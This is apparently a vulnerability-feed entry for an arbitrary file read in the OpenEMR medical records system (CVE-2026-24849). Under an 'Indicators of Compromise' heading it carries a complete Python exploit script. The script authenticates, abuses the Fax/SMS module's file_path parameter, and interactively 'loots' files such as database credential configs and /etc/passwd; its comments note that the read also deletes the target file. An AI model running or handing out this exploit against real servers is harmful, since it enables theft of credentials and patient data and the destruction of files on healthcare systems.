OpenEMR version 7. 0. 2 and earlier versions prior to 7. 0. 4 contain an arbitrary file read vulnerability. This issue allows an attacker to read files on the server that should not be accessible. The vulnerability affects deployments running on Ubuntu 22. 04 with PHP 8. 1 and Apache 2. 4.

AI Analysis

Indicators of Compromise

• exploit-code: # Exploit Title: OpenEMR 7.0.2 - Arbitrary File Read # Google Dork: intitle:"OpenEMR" inurl:"interface/login/login.php" # Date: 2026-06-06 # Exploit Author: doany1 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/7.0.2/openemr-7.0.2.tar.gz/download # Version: OpenEMR < 7.0.4 (tested on 7.0.2) # Tested on: Ubuntu 22.04 / PHP 8.1 / Apache 2.4 (OpenEMR 7.0.2) # CVE : CVE-2026-24849 # CWE : CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) # # Description: # The Fax/SMS module's EtherFaxActions::disposeDoc() method # (interface/modules/custom_modules/oe-module-faxsms) reads a caller-supplied # `file_path` request parameter and passes it straight to readfile() with no # path validation. The method never calls authenticate(), so the only thing # required to reach it is a valid OpenEMR session. # # Privilege required: # ANY authenticated user -- this is NOT an admin-only bug. A low-privilege # account (receptionist, clinician, etc.) can read any file the web-server # user can reach: sites/default/sqlconf.php (DB credentials), /etc/passwd, # application source, and so on. The admin/pass values in the examples below # are only convenient demo credentials, not a requirement of the bug. # # Prerequisites: # - Any valid OpenEMR login (no privileges required). # - The Fax/SMS module enabled with EtherFax selected as the fax provider # (the file read does NOT require a real EtherFax account). # # WARNING (destructive): # disposeDoc() calls unlink() on the target *after* reading it. Reading a file # that the web-server user is allowed to delete WILL remove it. Prefer # root-owned targets (e.g. /etc/passwd) whose parent directory the web user # cannot write, so the unlink() fails and the file survives. # # References: # https://github.com/openemr/openemr/security/advisories/GHSA-w6vc-hx2x-48pc # https://nvd.nist.gov/vuln/detail/CVE-2026-24849 # # Usage: # Interactive (prompts for everything): # python3 exploit-CVE-2026-24849.py # Non-interactive: # python3 exploit-CVE-2026-24849.py -t http://10.10.10.10 -u admin -P pass \ # -f /var/www/html/openemr/sites/default/sqlconf.php import argparse import getpass import re import sys try: import requests from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) except ImportError: sys.exit("[-] This exploit needs the 'requests' module: pip3 install requests") UA = "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0" FAXSMS = "/interface/modules/custom_modules/oe-module-faxsms/index.php" # Method name varies across affected minor versions (disposeDoc <-> disposeDocument). ACTIONS = ["disposeDoc", "disposeDocument"] # An unauthenticated request is answered with a JS redirect to this path. # (Use a narrow marker: every OpenEMR page embeds generic timeout JS.) FAIL_MARKER = "login_screen.php?error=1" def ask(prompt, default=None, secret=False): label = "%s [%s]: " % (prompt, default) if default else "%s: " % prompt value = getpass.getpass(label) if secret else input(label).strip() return value or default def login(sess, base, site, user, password): """Establish an OpenEMR session in `sess`. Validity is confirmed later by an actual file read, so this just performs the GET (CSRF prime) + POST.""" # 1) prime a session cookie and grab the CSRF token if the form exposes one r = sess.get(base + "/interface/login/login.php", params={"site": site}, timeout=20, verify=False) m = re.search(r"csrf_token_form.*?value=([\"'])(.*?)\1", r.text, re.S) data = { "new_login_session_management": "1", "authProvider": "Default", "authUser": user, "clearPass": password, "languageChoice": "1", } if m: # OpenEMR doesn't enforce it on this POST, but send it when present data["csrf_token_form"] = m.group(2) # 2) authenticate sess.post(base + "/interface/main/main_screen.php", params={"auth": "login", "site": site}, data=data, timeout=20, verify=False) def read_file(sess, base, site, remote_path): """Return (content, status). status in {ok, session, missing}.""" for action in ACTIONS: r = sess.get(base + FAXSMS, params={"site": site, "type": "fax", "_ACTION_COMMAND": action, "file_path": remote_path, "action": "download"}, timeout=20, verify=False) body = r.text if FAIL_MARKER in body: return None, "session" if "Problem with download" in body: return None, "missing" # method ran, file absent/unreadable if body.strip() == "": continue # likely wrong method name -> try next return body, "ok" return None, "missing" def main(): ap = argparse.ArgumentParser( description="OpenEMR < 7.0.4 authenticated arbitrary file read (CVE-2026-24849)") ap.add_argument("-t", "--target", help="Base URL, e.g. http://10.10.10.10") ap.add_argument("-u", "--user", help="OpenEMR username (default: admin)") ap.add_argument("-P", "--password", help="OpenEMR password") ap.add_argument("-s", "--site", help="OpenEMR site (default: default)") ap.add_argument("-f", "--file", help="Absolute path of the remote file to read") ap.add_argument("-o", "--output", help="Save looted file here instead of printing") args = ap.parse_args() print("[*] OpenEMR < 7.0.4 - Authenticated Arbitrary File Read (CVE-2026-24849)\n") target = args.target or ask("Target base URL (e.g. http://10.10.10.10)") if not target: sys.exit("[-] Target is required.") target = target.rstrip("/") if not target.startswith("http"): target = "http://" + target user = args.user or ask("Username", default="admin") password = args.password if args.password is not None else ask("Password", secret=True) site = args.site or ask("Site", default="default") sess = requests.Session() sess.headers.update({"User-Agent": UA}) try: print("[*] Authenticating to %s as '%s' ..." % (target, user)) login(sess, target, site, user, password) # Confirm auth + that the vulnerable module is reachable by reading a # safe, root-owned probe file (its unlink() fails, so it is not deleted). _, status = read_file(sess, target, site, "/etc/hostname") except requests.RequestException as e: sys.exit("[-] Connection error: %s" % e) if status == "session": sys.exit("[-] Login failed - check credentials / site.") if status == "missing": print("[!] Logged in, but the file-read returned nothing.") print(" Confirm the Fax/SMS module is enabled with EtherFax as the provider.\n") else: print("[+] Authenticated; CVE-2026-24849 file-read confirmed.\n") def loot(path): try: data, status = read_file(sess, target, site, path) except requests.RequestException as e: print("[-] Connection error: %s" % e) return "error" if status == "session": print("[-] Session rejected (auth/ACL problem).") elif status == "missing": print("[-] '%s' not found/readable, or Fax/SMS+EtherFax is not enabled." % path) else: if args.output: with open(args.output, "w") as fh: fh.write(data) print("[+] %d bytes of '%s' written to %s" % (len(data), path, args.output)) else: print("[+] ---------- %s ----------" % path) sys.stdout.write(data if data.endswith("\n") else data + "\n") print("[+] --------------------------") return status # single-shot mode if args.file: status = loot(args.file) sys.exit(0 if status == "ok" else 2) # interactive mode: read files until the operator quits print("[*] Interactive read - enter absolute file paths (blank or 'q' to quit).") print(" Reminder: disposeDoc() unlink()s the target after reading - prefer root-owned files.\n") while True: path = ask("file_path(Which file would you like to see e.g /etc/passwd)") if not path or path.lower() in ("q", "quit", "exit"): break loot(path) print() if __name__ == "__main__": main()